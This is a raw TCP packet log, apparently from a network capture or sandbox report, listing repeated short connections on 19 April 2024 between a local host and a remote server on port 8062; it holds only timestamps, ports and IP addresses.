Apr 19, 2024 09:51:53.065825939 CEST	49881	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:53.259462118 CEST	8062	49880	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:53.388530970 CEST	8062	49881	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:53.388633966 CEST	49881	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:53.388777971 CEST	49881	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:53.711250067 CEST	8062	49881	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:53.713859081 CEST	8062	49881	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:53.713923931 CEST	8062	49881	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:53.714129925 CEST	49881	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:53.714129925 CEST	49881	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:53.716950893 CEST	49881	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:53.830800056 CEST	49882	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:54.039371014 CEST	8062	49881	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:54.162000895 CEST	8062	49882	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:54.162163973 CEST	49882	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:54.162518024 CEST	49882	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:54.493561983 CEST	8062	49882	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:54.496021032 CEST	8062	49882	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:54.496059895 CEST	8062	49882	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:54.496088028 CEST	49882	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:54.496166945 CEST	49882	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:54.496193886 CEST	49882	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:54.611934900 CEST	49883	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:54.827191114 CEST	8062	49882	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:54.926671028 CEST	8062	49883	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:54.926768064 CEST	49883	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:54.927012920 CEST	49883	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:55.241590977 CEST	8062	49883	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:55.243680954 CEST	8062	49883	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:55.243721008 CEST	8062	49883	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:55.243881941 CEST	49883	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:55.243881941 CEST	49883	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:55.244362116 CEST	49883	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:55.360711098 CEST	49884	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:55.559143066 CEST	8062	49883	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:55.678195953 CEST	8062	49884	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:55.679253101 CEST	49884	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:55.679469109 CEST	49884	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:56.005085945 CEST	8062	49884	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:56.006063938 CEST	8062	49884	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:56.006107092 CEST	8062	49884	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:56.006294966 CEST	49884	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:56.006776094 CEST	49884	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:56.111191988 CEST	49885	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:56.324409962 CEST	8062	49884	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:56.435744047 CEST	8062	49885	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:56.436028004 CEST	49885	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:56.436218977 CEST	49885	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:56.761171103 CEST	8062	49885	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:56.763539076 CEST	8062	49885	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:56.763603926 CEST	49885	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:56.763673067 CEST	8062	49885	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:56.763736010 CEST	49885	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:56.876921892 CEST	49885	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:56.877477884 CEST	49886	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:57.196990967 CEST	8062	49886	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:57.197218895 CEST	49886	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:57.197369099 CEST	49886	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:57.201317072 CEST	8062	49885	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:57.516839027 CEST	8062	49886	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:57.522103071 CEST	8062	49886	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:57.522124052 CEST	8062	49886	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:57.522310972 CEST	49886	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:57.522310972 CEST	49886	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:57.522310972 CEST	49886	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:57.630461931 CEST	49887	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:57.841926098 CEST	8062	49886	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:57.942994118 CEST	8062	49887	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:57.944380999 CEST	49887	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:57.944602013 CEST	49887	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:58.257066011 CEST	8062	49887	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:58.258683920 CEST	8062	49887	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:58.258745909 CEST	8062	49887	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:58.258903027 CEST	49887	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:58.260896921 CEST	49887	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:58.376096010 CEST	49887	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:58.376420975 CEST	49888	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:58.688524008 CEST	8062	49887	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:58.719172001 CEST	8062	49888	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:58.719432116 CEST	49888	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:58.719432116 CEST	49888	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:59.062411070 CEST	8062	49888	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:59.064054966 CEST	8062	49888	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:59.064097881 CEST	8062	49888	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:59.064191103 CEST	49888	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:59.064192057 CEST	49888	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:59.064280987 CEST	49888	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:59.173542976 CEST	49889	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:59.407047987 CEST	8062	49888	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:59.495362997 CEST	8062	49889	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:59.496488094 CEST	49889	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:59.496820927 CEST	49889	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:59.818713903 CEST	8062	49889	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:59.820415974 CEST	8062	49889	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:59.820456982 CEST	8062	49889	8.218.236.5	192.168.2.4
Apr 19, 2024 09:51:59.820549011 CEST	49889	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:59.820549011 CEST	49889	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:59.820636988 CEST	49889	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:51:59.926418066 CEST	49890	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:00.142319918 CEST	8062	49889	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:00.241655111 CEST	8062	49890	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:00.241761923 CEST	49890	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:00.241965055 CEST	49890	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:00.557153940 CEST	8062	49890	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:00.559451103 CEST	8062	49890	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:00.559506893 CEST	8062	49890	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:00.559523106 CEST	49890	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:00.559602976 CEST	49890	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:00.559648991 CEST	49890	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:00.673814058 CEST	49891	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:00.874942064 CEST	8062	49890	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:00.993738890 CEST	8062	49891	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:00.993855953 CEST	49891	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:00.994110107 CEST	49891	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:01.314095020 CEST	8062	49891	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:01.315985918 CEST	8062	49891	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:01.316025019 CEST	8062	49891	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:01.316049099 CEST	49891	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:01.316137075 CEST	49891	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:01.316351891 CEST	49891	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:01.470822096 CEST	49892	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:01.636220932 CEST	8062	49891	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:01.786686897 CEST	8062	49892	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:01.788414001 CEST	49892	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:01.795308113 CEST	49892	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:02.111102104 CEST	8062	49892	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:02.113545895 CEST	8062	49892	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:02.113585949 CEST	8062	49892	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:02.115796089 CEST	49892	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:02.115926027 CEST	49892	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:02.220552921 CEST	49893	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:02.431706905 CEST	8062	49892	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:02.540141106 CEST	8062	49893	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:02.540235043 CEST	49893	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:02.540461063 CEST	49893	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:02.863183975 CEST	8062	49893	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:02.864877939 CEST	8062	49893	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:02.864907980 CEST	8062	49893	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:02.865017891 CEST	49893	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:02.865245104 CEST	49893	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:02.865245104 CEST	49893	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:02.971106052 CEST	49894	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:03.186043978 CEST	8062	49893	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:03.287897110 CEST	8062	49894	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:03.287966013 CEST	49894	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:03.288181067 CEST	49894	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:03.605148077 CEST	8062	49894	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:03.606941938 CEST	8062	49894	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:03.606981039 CEST	8062	49894	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:03.607117891 CEST	49894	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:03.607117891 CEST	49894	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:03.721009970 CEST	49895	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:03.924130917 CEST	8062	49894	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:04.051350117 CEST	8062	49895	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:04.051671028 CEST	49895	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:04.051944971 CEST	49895	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:04.381994009 CEST	8062	49895	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:04.384380102 CEST	8062	49895	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:04.384422064 CEST	8062	49895	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:04.384614944 CEST	49895	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:04.384819031 CEST	49895	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:04.506474018 CEST	49896	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:04.715189934 CEST	8062	49895	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:04.820862055 CEST	8062	49896	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:04.821074963 CEST	49896	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:04.821177006 CEST	49896	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:05.135519981 CEST	8062	49896	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:05.137217999 CEST	8062	49896	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:05.137258053 CEST	8062	49896	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:05.137428999 CEST	49896	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:05.137428999 CEST	49896	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:05.137428999 CEST	49896	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:05.251308918 CEST	49897	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:05.451983929 CEST	8062	49896	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:05.567692995 CEST	8062	49897	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:05.567826986 CEST	49897	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:05.568392992 CEST	49897	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:05.884866953 CEST	8062	49897	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:05.886807919 CEST	8062	49897	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:05.886863947 CEST	8062	49897	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:05.886889935 CEST	49897	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:05.886981964 CEST	49897	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:05.887037992 CEST	49897	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:06.004637957 CEST	49898	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:06.203438997 CEST	8062	49897	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:06.333652973 CEST	8062	49898	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:06.333762884 CEST	49898	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:06.333926916 CEST	49898	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:06.662324905 CEST	8062	49898	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:06.664911032 CEST	8062	49898	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:06.664951086 CEST	8062	49898	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:06.665087938 CEST	49898	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:06.665087938 CEST	49898	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:06.699759960 CEST	49898	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:06.814805031 CEST	49899	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:07.027996063 CEST	8062	49898	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:07.128873110 CEST	8062	49899	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:07.129101038 CEST	49899	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:07.219130039 CEST	49899	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:07.533168077 CEST	8062	49899	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:07.534831047 CEST	8062	49899	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:07.534871101 CEST	8062	49899	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:07.540945053 CEST	49899	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:08.277820110 CEST	49899	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:08.478091002 CEST	49900	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:08.591885090 CEST	8062	49899	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:08.800760984 CEST	8062	49900	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:08.800848961 CEST	49900	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:08.801125050 CEST	49900	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:09.123647928 CEST	8062	49900	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:09.125375032 CEST	8062	49900	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:09.125416040 CEST	8062	49900	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:09.125432014 CEST	49900	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:09.125466108 CEST	49900	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:09.125601053 CEST	49900	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:09.237602949 CEST	49901	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:09.451589108 CEST	8062	49900	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:09.566207886 CEST	8062	49901	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:09.566704035 CEST	49901	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:09.566704035 CEST	49901	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:09.891599894 CEST	8062	49901	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:09.893568039 CEST	8062	49901	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:09.893610001 CEST	8062	49901	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:09.893668890 CEST	49901	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:09.893668890 CEST	49901	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:09.893764973 CEST	49901	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:10.001311064 CEST	49902	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:10.217295885 CEST	8062	49901	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:10.323801041 CEST	8062	49902	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:10.324435949 CEST	49902	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:10.324820042 CEST	49902	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:10.647300005 CEST	8062	49902	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:10.649077892 CEST	8062	49902	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:10.649117947 CEST	8062	49902	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:10.649149895 CEST	49902	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:10.649209023 CEST	49902	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:10.649321079 CEST	49902	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:10.775073051 CEST	49903	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:10.971566916 CEST	8062	49902	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:11.098505020 CEST	8062	49903	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:11.098592043 CEST	49903	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:11.098809004 CEST	49903	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:11.422254086 CEST	8062	49903	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:11.424015999 CEST	8062	49903	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:11.424037933 CEST	8062	49903	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:11.424084902 CEST	49903	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:11.424165010 CEST	49903	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:11.424329996 CEST	49903	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:11.536537886 CEST	49904	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:11.747647047 CEST	8062	49903	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:11.856076956 CEST	8062	49904	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:11.856168032 CEST	49904	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:11.856529951 CEST	49904	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:12.176058054 CEST	8062	49904	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:12.177872896 CEST	8062	49904	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:12.177911997 CEST	8062	49904	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:12.177993059 CEST	49904	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:12.178189039 CEST	49904	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:12.282809019 CEST	49905	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:12.498411894 CEST	8062	49904	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:12.597398043 CEST	8062	49905	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:12.597469091 CEST	49905	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:12.597721100 CEST	49905	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:12.914099932 CEST	8062	49905	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:12.915949106 CEST	8062	49905	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:12.915987015 CEST	8062	49905	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:12.916006088 CEST	49905	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:12.916074038 CEST	49905	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:12.916147947 CEST	49905	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:13.032576084 CEST	49906	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:13.230963945 CEST	8062	49905	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:13.348680973 CEST	8062	49906	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:13.348753929 CEST	49906	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:13.348959923 CEST	49906	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:13.665518045 CEST	8062	49906	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:13.667537928 CEST	8062	49906	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:13.667574883 CEST	8062	49906	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:13.668132067 CEST	49906	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:13.668258905 CEST	49906	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:13.786437035 CEST	49907	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:13.984524012 CEST	8062	49906	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:14.103030920 CEST	8062	49907	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:14.103120089 CEST	49907	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:14.103409052 CEST	49907	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:14.419884920 CEST	8062	49907	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:14.421895027 CEST	8062	49907	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:14.421935081 CEST	8062	49907	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:14.422053099 CEST	49907	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:14.422163963 CEST	49907	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:14.534693956 CEST	49908	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:14.738852978 CEST	8062	49907	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:14.872020006 CEST	8062	49908	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:14.872142076 CEST	49908	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:14.872359991 CEST	49908	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:15.208990097 CEST	8062	49908	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:15.210737944 CEST	8062	49908	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:15.210777998 CEST	8062	49908	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:15.210829973 CEST	49908	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:15.210829973 CEST	49908	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:15.210923910 CEST	49908	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:15.315040112 CEST	49909	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:15.547475100 CEST	8062	49908	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:15.627228022 CEST	8062	49909	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:15.628530979 CEST	49909	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:15.628618002 CEST	49909	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:15.940778971 CEST	8062	49909	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:15.942428112 CEST	8062	49909	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:15.942445993 CEST	8062	49909	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:15.942615986 CEST	49909	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:15.942615986 CEST	49909	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:16.050343037 CEST	49910	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:16.254870892 CEST	8062	49909	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:16.375124931 CEST	8062	49910	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:16.376622915 CEST	49910	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:16.377012014 CEST	49910	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:16.701910973 CEST	8062	49910	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:16.703568935 CEST	8062	49910	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:16.703608036 CEST	8062	49910	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:16.703644037 CEST	49910	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:16.703727961 CEST	49910	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:16.704014063 CEST	49910	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:16.857805967 CEST	49911	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:17.032713890 CEST	8062	49910	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:17.183880091 CEST	8062	49911	8.218.236.5	192.168.2.4
Apr 19, 2024 09:52:17.184010983 CEST	49911	8062	192.168.2.4	8.218.236.5
Apr 19, 2024 09:52:17.184195042 CEST	49911	8062	192.168.2.4	8.218.236.5
